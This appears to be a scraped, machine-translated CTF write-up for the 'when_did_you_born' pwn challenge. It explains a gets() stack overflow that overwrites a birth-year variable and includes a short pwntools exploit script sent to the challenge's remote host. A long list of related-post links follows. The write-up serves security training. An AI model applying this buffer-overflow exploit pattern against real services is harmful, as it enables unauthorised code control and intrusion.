pwn when did you born - Code World

pwn when did you born

Others 2020-09-25 19:19:00 views: null

Stack overflow question
Source: https://cgctf.nuptsast.com/challenges#Pwn
Insert picture description here
dragged into IDA (64-bit) to
analyze a wave of code, see this gets, it should be a stack overflow.
First of all, we need to provide one that is not 1926 Value, and then change the value of v5 to 1926 by entering the overflow of v4, and you can get the flag

Insert picture description here
Then calculate the offset, v4 is ebp-20h, v5 is ebp-18h, the difference is 8h, and the payload is out.
Write the script below and run it to get the flag

from pwn import *
sh = remote('ctf.acdxvfsvd.net',1926)
payload = 'a' * 0x8 + p64(1926)
sh.recvuntil("What\'s Your Birth?\n")
sh.sendline("1927")
sh.recvuntil("What\'s Your Name?\n")
sh.sendline(payload)
sh.interactive()

Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_45677731/article/details/104420924

pwn when did you born

XCTF - pwn when_did_you_born - WP

XCTF when_did_you_born write up

when_did_you_born- cast a glance to the wp

XCTF - PWN when_did_you_born - WP

XCTF - PWN when_did_you_born - WP

when_did_you_born- бросил взгляд на сор

When did you suddenly feel hopeless?

What did you know when you became the boss?

XCTF when_did_you_born пишут

XCTF - СОБСТВЕННЫЙ when_did_you_born - WP

When applying for a traffic card, did you know about pitfalls?

After going to ByteDance, did you know that there are so many Android developers born in the 90s with an annual salary of 40w?

Occurs when you use gulp [Did you forget to signal async completion?]

XCTF 최대 쓰기 when_did_you_born

When you create a Web service using Netbeans function, did not create a bug ApplicationConfig.java class

redis source code analysis (eight) - When you start the Redis, Redis did what

Python helps you analyze how many times did Sun Monkey appear when he was making trouble in Tiangong?

If you did not have in the past

When did when circulating for a while loop?

Flask, django-how to import and run the project in pycharm, when flask appears, you did not provide the "FLASK_APP" error resolution

Did you learn UI design?

Hyperparameters in Python, did you know?

How did you get the API?

XCTFは、最大書き込みwhen_did_you_born

WPに視線を投げwhen_did_you_born-

wp를에 눈을 캐스팅 when_did_you_born-

Is the company feeding you? Or did you feed the company?

Is the company feeding you? Or did you feed the company?

Fight malaria, did not go well? You did not watch this!

Recommended

Ranking

#2019110700005

What materials and procedures are required for patent transfer

What is the blockchain Ethereum triplet state root transaction root receipt root

Front-end study notes 04 --- About the insertion of html pictures and videos

Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries

2017 Qingdao-site tournament I The Squared Mosquito Coil

[BZOJ3165][HEOI2013]Segment (line segment tree without marking)

Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju

The latest tutorial on making framework for iOS

DAX Section 6: Statistical Functions

Daily

More

2024-05-14(9)

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)